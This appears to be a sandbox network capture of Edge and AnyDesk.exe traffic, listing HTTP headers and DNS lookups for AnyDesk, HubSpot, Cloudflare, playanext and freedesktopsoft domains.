Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8cdeab607ef38b44-AMS
Content-Encoding: br
GET

https://anydesk.com/_static/manifest.json

msedge.exe

Remote address:

18.66.248.79:443

Request

GET /_static/manifest.json HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: manifest
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:01:01 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 c7a5852ebe9db847874084d43de89f0e.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Sfs0urxHVBdOdoLkshNyxDwXCSAYjLn7MRytr4k7fc_2IGqxHPZRDw==
age: 61636
GET

https://anydesk.com/_static/manifest.json

msedge.exe

Remote address:

18.66.248.79:443

Request

GET /_static/manifest.json HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: manifest
referer: https://anydesk.com/en/downloads
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:01:01 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 c7a5852ebe9db847874084d43de89f0e.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: y82BhVsOJTp2eJ_LEZefAZa-I2KDqSbvagnTO7Zqx_21c4vHmFb7lA==
age: 61636
GET

https://anydesk.com/_static/manifest.json

msedge.exe

Remote address:

18.66.248.79:443

Request

GET /_static/manifest.json HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: manifest
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:01:01 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 c7a5852ebe9db847874084d43de89f0e.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ekFN2nwOXkA7YgGhAHjZGvjzHA6Njatle1Rwx0sQaBqGqjWhRKqqdQ==
age: 61637
DNS

track.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

track.hubspot.com

IN A

Response

track.hubspot.com

IN A

104.16.118.116

track.hubspot.com

IN A

104.16.117.116
DNS

track.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

track.hubspot.com

IN A

Response

track.hubspot.com

IN A

104.16.117.116

track.hubspot.com

IN A

104.16.118.116
DNS

79.248.66.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.248.66.18.in-addr.arpa

IN PTR

Response

79.248.66.18.in-addr.arpa

IN PTR

server-18-66-248-79dus51r cloudfrontnet
DNS

79.248.66.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.248.66.18.in-addr.arpa

IN PTR

Response

79.248.66.18.in-addr.arpa

IN PTR

server-18-66-248-79dus51r cloudfrontnet
GET

https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

msedge.exe

Remote address:

104.18.80.204:443

Request

GET /embed/v3/counters.gif?key=config-loaded-failure&value=1 HTTP/1.1
Host: perf-na1.hsforms.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://anydesk.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: __cf_bm=qxDA273XjP9hQVVfnye4AR93CjGzNsiFDXgAeUMQ7lw-1728144471-1.0.1.1-WuSBd2JnhfFpN_GqWbfkCVV7r7Wy7CwrvIREJcm1Y_bYAHfysanIK6YsQ4iYpnrEUQOcIJff0jAhsOLN9dSwGQ

Response

HTTP/1.1 403 Forbidden

Date: Sat, 05 Oct 2024 16:08:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Sat, 05 Oct 2024 16:08:33 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8cdeab6d1c63b96c-AMS
Content-Encoding: br
DNS

a.nel.cloudflare.com

msedge.exe

Remote address:

8.8.8.8:53

Request

a.nel.cloudflare.com

IN A

Response

a.nel.cloudflare.com

IN A

35.190.80.1
DNS

a.nel.cloudflare.com

msedge.exe

Remote address:

8.8.8.8:53

Request

a.nel.cloudflare.com

IN A

Response

a.nel.cloudflare.com

IN A

35.190.80.1
OPTIONS

https://a.nel.cloudflare.com/report/v4?s=HIfAYdjoL0JvqGZFBV%2Bu5yoa1A4TFzMRaNodOViRc%2FwthtEQSNMmu3GOkVVWKVjuNl5bFV%2BfQKvAqiQRK4YN8MRIOHgATvW2LNB0wc8kJoVyYE6ZVK3JUdJ%2FKCDkr8WxRg%3D%3D

msedge.exe

Remote address:

35.190.80.1:443

Request

OPTIONS /report/v4?s=HIfAYdjoL0JvqGZFBV%2Bu5yoa1A4TFzMRaNodOViRc%2FwthtEQSNMmu3GOkVVWKVjuNl5bFV%2BfQKvAqiQRK4YN8MRIOHgATvW2LNB0wc8kJoVyYE6ZVK3JUdJ%2FKCDkr8WxRg%3D%3D HTTP/2.0
host: a.nel.cloudflare.com
origin: https://api.hubspot.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
OPTIONS

https://a.nel.cloudflare.com/report/v4?s=HzrLQl7OFwHthB%2B4mmJoByqKVDvKO08CZbJ6jmYjtMnuVJMt39OoXMxY%2FQ5ckNFAQkQmOCeODFPoar1KEykRexEtRWVkpFnaRb6nrzTllJfz8Ng07p6YDi7tHCSCi%2BIJKmyNbXXKbdAzZE%2FOcpI%3D

msedge.exe

Remote address:

35.190.80.1:443

Request

OPTIONS /report/v4?s=HzrLQl7OFwHthB%2B4mmJoByqKVDvKO08CZbJ6jmYjtMnuVJMt39OoXMxY%2FQ5ckNFAQkQmOCeODFPoar1KEykRexEtRWVkpFnaRb6nrzTllJfz8Ng07p6YDi7tHCSCi%2BIJKmyNbXXKbdAzZE%2FOcpI%3D HTTP/2.0
host: a.nel.cloudflare.com
origin: https://cta-service-cms2.hubspot.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
OPTIONS

https://a.nel.cloudflare.com/report/v4?s=6pAdnQrYMedxWQPr6dO7OgVqYlKGZHgQQDaGadwI78Zmpikhb3yecYQyrjl%2FIk4uGaB5GNiIzrkMVW5BM1peARvjJNLfyJf7KcrEgSHRqFSlOCU4algAvmN65sDB8tjDfQ%3D%3D

msedge.exe

Remote address:

35.190.80.1:443

Request

OPTIONS /report/v4?s=6pAdnQrYMedxWQPr6dO7OgVqYlKGZHgQQDaGadwI78Zmpikhb3yecYQyrjl%2FIk4uGaB5GNiIzrkMVW5BM1peARvjJNLfyJf7KcrEgSHRqFSlOCU4algAvmN65sDB8tjDfQ%3D%3D HTTP/2.0
host: a.nel.cloudflare.com
origin: https://api.hubspot.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
OPTIONS

https://a.nel.cloudflare.com/report/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D

msedge.exe

Remote address:

35.190.80.1:443

Request

OPTIONS /report/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D HTTP/2.0
host: a.nel.cloudflare.com
origin: https://cta-service-cms2.hubspot.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
OPTIONS

https://a.nel.cloudflare.com/report/v4?s=6pAdnQrYMedxWQPr6dO7OgVqYlKGZHgQQDaGadwI78Zmpikhb3yecYQyrjl%2FIk4uGaB5GNiIzrkMVW5BM1peARvjJNLfyJf7KcrEgSHRqFSlOCU4algAvmN65sDB8tjDfQ%3D%3D

msedge.exe

Remote address:

35.190.80.1:443

Request

OPTIONS /report/v4?s=6pAdnQrYMedxWQPr6dO7OgVqYlKGZHgQQDaGadwI78Zmpikhb3yecYQyrjl%2FIk4uGaB5GNiIzrkMVW5BM1peARvjJNLfyJf7KcrEgSHRqFSlOCU4algAvmN65sDB8tjDfQ%3D%3D HTTP/2.0
host: a.nel.cloudflare.com
origin: https://api.hubspot.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
OPTIONS

https://a.nel.cloudflare.com/report/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D

msedge.exe

Remote address:

35.190.80.1:443

Request

OPTIONS /report/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D HTTP/2.0
host: a.nel.cloudflare.com
origin: https://cta-service-cms2.hubspot.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
OPTIONS

https://a.nel.cloudflare.com/report/v4?s=6pAdnQrYMedxWQPr6dO7OgVqYlKGZHgQQDaGadwI78Zmpikhb3yecYQyrjl%2FIk4uGaB5GNiIzrkMVW5BM1peARvjJNLfyJf7KcrEgSHRqFSlOCU4algAvmN65sDB8tjDfQ%3D%3D

msedge.exe

Remote address:

35.190.80.1:443

Request

OPTIONS /report/v4?s=6pAdnQrYMedxWQPr6dO7OgVqYlKGZHgQQDaGadwI78Zmpikhb3yecYQyrjl%2FIk4uGaB5GNiIzrkMVW5BM1peARvjJNLfyJf7KcrEgSHRqFSlOCU4algAvmN65sDB8tjDfQ%3D%3D HTTP/2.0
host: a.nel.cloudflare.com
origin: https://api.hubspot.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
OPTIONS

https://a.nel.cloudflare.com/report/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D

msedge.exe

Remote address:

35.190.80.1:443

Request

OPTIONS /report/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D HTTP/2.0
host: a.nel.cloudflare.com
origin: https://cta-service-cms2.hubspot.com
access-control-request-method: POST
access-control-request-headers: content-type
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

msedge.exe

Remote address:

104.18.80.204:443

Request

GET /embed/v3/counters.gif?key=config-loaded-failure&value=1 HTTP/1.1
Host: perf-na1.hsforms.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://anydesk.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: __cf_bm=qxDA273XjP9hQVVfnye4AR93CjGzNsiFDXgAeUMQ7lw-1728144471-1.0.1.1-WuSBd2JnhfFpN_GqWbfkCVV7r7Wy7CwrvIREJcm1Y_bYAHfysanIK6YsQ4iYpnrEUQOcIJff0jAhsOLN9dSwGQ

Response

HTTP/1.1 403 Forbidden

Date: Sat, 05 Oct 2024 16:08:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Sat, 05 Oct 2024 16:08:47 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8cdeabc24dafb942-AMS
Content-Encoding: br
DNS

1.80.190.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.80.190.35.in-addr.arpa

IN PTR

Response

1.80.190.35.in-addr.arpa

IN PTR

18019035bcgoogleusercontentcom
DNS

7940397.fs1.hubspotusercontent-na1.net

msedge.exe

Remote address:

8.8.8.8:53

Request

7940397.fs1.hubspotusercontent-na1.net

IN A

Response

7940397.fs1.hubspotusercontent-na1.net

IN A

172.64.146.132

7940397.fs1.hubspotusercontent-na1.net

IN A

104.18.41.124
DNS

7940397.fs1.hubspotusercontent-na1.net

msedge.exe

Remote address:

8.8.8.8:53

Request

7940397.fs1.hubspotusercontent-na1.net

IN A

Response

7940397.fs1.hubspotusercontent-na1.net

IN A

172.64.146.132

7940397.fs1.hubspotusercontent-na1.net

IN A

104.18.41.124
GET

https://7940397.fs1.hubspotusercontent-na1.net/hub/7940397/hubfs/Chatbot%20figure%20-%20create%20AnyDesk%20FINAL_with%20Shadow.png?width=108&height=108

msedge.exe

Remote address:

172.64.146.132:443

Request

GET /hub/7940397/hubfs/Chatbot%20figure%20-%20create%20AnyDesk%20FINAL_with%20Shadow.png?width=108&height=108 HTTP/2.0
host: 7940397.fs1.hubspotusercontent-na1.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:44 GMT
content-type: image/webp
content-length: 2892
cf-ray: 8cdeac0d3844b7e4-AMS
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
cache-control: s-maxage=2592000, max-age=1209600, stale-while-revalidate=900
etag: "cfT19AT_zklqWa4ICnVtHkfQdeUn9Bg2vL7Sxl6y2PDQ:629311c6024ab0baf40cdbe3062ddceb"
last-modified: Fri, 15 Jul 2022 12:49:54 GMT
vary: Accept, Accept-Encoding
via: 1.1 64c95802ff188dd41dd32c313bef089c.cloudfront.net (CloudFront)
cache-tag: F-79292811392,P-7940397,FLS-ALL
cf-bgj: imgq:86,h2pri
cf-resized: internal=ok/m q=0 n=215+0 c=1+5 v=2024.6.0 l=2892
content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
timing-allow-origin: 7940397.fs1.hubspotusercontent-na1.net
x-content-type-options: nosniff
server: cloudflare
DNS

132.146.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

132.146.64.172.in-addr.arpa

IN PTR

Response
DNS

132.146.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

132.146.64.172.in-addr.arpa

IN PTR

Response
DNS

boot.net.anydesk.com

AnyDesk.exe

Remote address:

8.8.8.8:53

Request

boot.net.anydesk.com

IN A

Response

boot.net.anydesk.com

IN A

57.129.37.28
DNS

boot.net.anydesk.com

AnyDesk.exe

Remote address:

8.8.8.8:53

Request

boot.net.anydesk.com

IN A

Response

boot.net.anydesk.com

IN A

57.129.37.157
DNS

relay-c9990d24.net.anydesk.com

AnyDesk.exe

Remote address:

8.8.8.8:53

Request

relay-c9990d24.net.anydesk.com

IN A

Response

relay-c9990d24.net.anydesk.com

IN A

208.115.231.190
DNS

28.37.129.57.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.37.129.57.in-addr.arpa

IN PTR

Response

28.37.129.57.in-addr.arpa

IN PTR

ns3070623ip-57-129-37eu
DNS

190.231.115.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.231.115.208.in-addr.arpa

IN PTR

Response

190.231.115.208.in-addr.arpa

IN PTR

relay-c9990d24netanydeskcom
DNS

190.231.115.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.231.115.208.in-addr.arpa

IN PTR

Response

190.231.115.208.in-addr.arpa

IN PTR

relay-c9990d24netanydeskcom
DNS

api.playanext.com

AnyDesk.exe

Remote address:

8.8.8.8:53

Request

api.playanext.com

IN A

Response

api.playanext.com

IN CNAME

d1atxff5avezsq.cloudfront.net

d1atxff5avezsq.cloudfront.net

IN A

18.173.233.63

d1atxff5avezsq.cloudfront.net

IN A

18.173.233.17

d1atxff5avezsq.cloudfront.net

IN A

18.173.233.47

d1atxff5avezsq.cloudfront.net

IN A

18.173.233.31
DNS

api.playanext.com

AnyDesk.exe

Remote address:

8.8.8.8:53

Request

api.playanext.com

IN A

Response

api.playanext.com

IN CNAME

d1atxff5avezsq.cloudfront.net

d1atxff5avezsq.cloudfront.net

IN A

18.173.233.31

d1atxff5avezsq.cloudfront.net

IN A

18.173.233.63

d1atxff5avezsq.cloudfront.net

IN A

18.173.233.17

d1atxff5avezsq.cloudfront.net

IN A

18.173.233.47
DNS

AnyDesk.exe

Remote address:

18.173.233.31:80

Response

HTTP/1.1 200 OK

Content-Type: application/json
Content-Length: 0
Connection: keep-alive
Date: Sat, 05 Oct 2024 16:08:57 GMT
X-Amzn-Trace-Id: Root=1-67016499-3fa526f93491b0870b9fb502;Parent=5c27fa9c4ab2dcfd;Sampled=0;Lineage=1:d7502c8f:0
x-amzn-RequestId: 41df1f71-9776-4a5c-86c6-e054da820919
x-amz-apigw-id: fLyoGFAJIAMEeoA=
X-Amz-Cf-Pop: DUS51-P3
Via: 1.1 96715c2264ed86dcc0da2beca3559080.cloudfront.net (CloudFront), 1.1 7aeb9f6264b63b6db1402e3d82775cf2.cloudfront.net (CloudFront)
X-Cache: Miss from cloudfront
X-Amz-Cf-Pop: DUS51-P3
X-Amz-Cf-Id: xlFYypP-FJXSI7dCaNo3o4ac67VXrJYArFRIjip-IHsKexKEJKJ-gA==
DNS

AnyDesk.exe

Remote address:

18.173.233.31:80

Response

HTTP/1.1 200 OK

Content-Type: application/json
Content-Length: 0
Connection: keep-alive
Date: Sat, 05 Oct 2024 16:08:58 GMT
X-Amzn-Trace-Id: Root=1-6701649a-4cde8fc1070ccef923b91fdb;Parent=06b4b1ed66845e0e;Sampled=0;Lineage=1:d7502c8f:0
x-amzn-RequestId: 9d3edd36-01dc-4b4e-b67e-6c44bb69727d
x-amz-apigw-id: fLyoIHq3oAMEDZw=
X-Amz-Cf-Pop: DUS51-P3
Via: 1.1 7270c380adcd801a51b624e5f77df782.cloudfront.net (CloudFront), 1.1 eed2fc0be4de295d60fbdc1c413e4628.cloudfront.net (CloudFront)
X-Cache: Miss from cloudfront
X-Amz-Cf-Pop: DUS51-P3
X-Amz-Cf-Id: jZFvhYkdGSWxmMeUZQr2EZrGS8MWbB3DUViUZB4psuooKMl51VUI_w==
DNS

31.233.173.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.233.173.18.in-addr.arpa

IN PTR

Response

31.233.173.18.in-addr.arpa

IN PTR

server-18-173-233-31dus51r cloudfrontnet
DNS

31.233.173.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.233.173.18.in-addr.arpa

IN PTR

Response

31.233.173.18.in-addr.arpa

IN PTR

server-18-173-233-31dus51r cloudfrontnet
DNS

143.209.114.79.in-addr.arpa

Remote address:

8.8.8.8:53

Request

143.209.114.79.in-addr.arpa

IN PTR

Response

143.209.114.79.in-addr.arpa

IN PTR

79-114-209-143rdsnetro
DNS

15.100.168.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.100.168.192.in-addr.arpa

IN PTR

Response
DNS

67.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.31.126.40.in-addr.arpa

IN PTR

Response
DNS

freedesktopsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

freedesktopsoft.com

IN A

Response

freedesktopsoft.com

IN A

78.46.117.95
DNS

freedesktopsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

freedesktopsoft.com

IN A

Response

freedesktopsoft.com

IN A

78.46.117.95
GET

http://freedesktopsoft.com/butterflyondesktoplike.html

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /butterflyondesktoplike.html HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:13 GMT
Server: Apache
Upgrade: h2c
Connection: Upgrade, Keep-Alive
Keep-Alive: timeout=15, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
GET

http://freedesktopsoft.com/images/banner_bg2.jpg

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /images/banner_bg2.jpg HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://freedesktopsoft.com/butterflyondesktoplike.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:14 GMT
Server: Apache
Last-Modified: Tue, 09 Apr 2019 09:50:46 GMT
ETag: "a00-58615e31bd96c"
Accept-Ranges: bytes
Content-Length: 2560
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: image/jpeg
GET

http://freedesktopsoft.com/main.css

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /main.css HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: text/css,*/*;q=0.1
Referer: http://freedesktopsoft.com/butterflyondesktoplike.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:14 GMT
Server: Apache
Upgrade: h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 09 Apr 2019 09:50:19 GMT
ETag: "1095-58615e1833ae5"
Accept-Ranges: bytes
Content-Length: 4245
Keep-Alive: timeout=15, max=100
Content-Type: text/css
GET

http://freedesktopsoft.com/images/menubackground2.jpg

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /images/menubackground2.jpg HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://freedesktopsoft.com/butterflyondesktoplike.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:13:14 GMT
Server: Apache
Last-Modified: Tue, 09 Apr 2019 09:50:48 GMT
ETag: "41aa-58615e33bc513"
Accept-Ranges: bytes
Content-Length: 16810
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: image/jpeg
DNS

95.117.46.78.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.117.46.78.in-addr.arpa

IN PTR

Response

95.117.46.78.in-addr.arpa

IN PTR

www366your-serverde
DNS

95.117.46.78.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.117.46.78.in-addr.arpa

IN PTR
DNS

95.117.46.78.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.117.46.78.in-addr.arpa

IN PTR
GET

http://freedesktopsoft.com/slider/slider.css

msedge.exe

Remote address:

78.46.117.95:80

Request

GET /slider/slider.css HTTP/1.1
Host: freedesktopsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
